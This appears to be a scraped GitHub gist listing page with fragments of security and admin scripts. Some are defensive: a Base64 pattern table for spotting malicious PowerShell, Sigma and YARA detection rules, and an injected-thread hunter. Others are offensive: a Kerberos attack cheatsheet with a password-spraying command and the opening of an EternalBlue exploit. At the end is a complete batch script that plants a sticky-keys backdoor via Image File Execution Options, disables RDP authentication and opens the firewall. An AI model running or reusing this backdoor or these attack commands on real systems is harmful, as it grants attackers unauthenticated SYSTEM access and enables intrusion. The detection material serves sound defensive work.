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JustinGrote / Get-AzRetailPrice.ps1
Created November 2, 2020 01:45
Azure Retail Pricing API Proof of Concept
function Get-AzSpotPrice {
param (
#VM SKU (e.g. Standard_F8s)
#Azure Region (e.g. brazilsouth)
#ODATA filter to use on the data
#Maximum number of records to retrieve, or specify 'Unlimited' for all records. Defaults to 100. This behaves like the Exchange Cmdlets
JustinGrote / Test-DNSName.ps1
Last active July 30, 2021 03:05
High Performance DNS Resolver in Powershell
using namespace System.Net
using namespace System.Threading.Tasks
using namespace System.Management.Automation
using namespace System.Collections.Generic
function Test-DNSName ([String[]]$hostnames, [int]$Timeout = 3000) {
Given a list of DNS names, returns the ones that actually resolve to an actual name
Neo23x0 /
Last active August 26, 2024 21:26
Learning Aid - Top Base64 Encodings Table

Base64 Patterns - Learning Aid

Base64 Code Mnemonic Aid Decoded* Description
JAB 🗣 Jabber $. Variable declaration (UTF-16), e.g. JABlAG4AdgA for $env:
TVq 📺 Television MZ MZ header
SUVY 🚙 SUV IEX PowerShell Invoke Expression
SQBFAF 🐣 Squab favorite I.E. PowerShell Invoke Expression (UTF-16)
SQBuAH 🐣 Squab uahhh I.n. PowerShell Invoke string (UTF-16) e.g. Invoke-Mimikatz
PAA 💪 "Pah!" &lt;. Often used by Emotet (UTF-16)
Neo23x0 / sysmon_suspicious_keyboard_layout_load.yml
Last active September 4, 2020 15:41
Sigma Rule to Detect Uncommon Keyboard Layout Loads in Your Organisation
title: Suspicious Keyboard Layout Load
description: Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only
author: Florian Roth
date: 2019/10/12
product: windows
service: sysmon
definition: 'Requirements: Sysmon config that monitors \Keyboard Layout\Preload subkey of the HKLU hives - see'
TarlogicSecurity /
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet



python -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

Neo23x0 / iddqd.yar
Last active August 1, 2024 09:08
IDDQD - Godmode YARA Rule
the newest version of this rule is now hosted here:
_____ __ __ ___ __
worawit /
Last active March 16, 2024 18:38
Eternalblue exploit for Windows 8/2012
# This file has no update anymore. Please see
from impacket import smb, ntlm
from struct import pack
import sys
import socket
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)
jaredcatkinson / Get-InjectedThread.ps1
Last active September 19, 2024 16:14
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
function Get-InjectedThread
Looks for threads that were created as a result of code injection.
micmaher / sendEWSemail.ps1
Last active February 4, 2022 22:53
PowerShell Script - Send Email over Internet using Exchange Web Services API
Function Send-EWSEmail
Sends email via Exchange Web Services
Must be run with parameters
ahhh / sticky_keys_persitence.bat
Last active September 9, 2022 10:17
Batch script to launch a cmd backdoor when stickykeys, utiliman, or display keyboard hotkeys are toggled. Also starts RDP.
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
netsh firewall set service type = remotedesktop mode = enable
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
net start TermService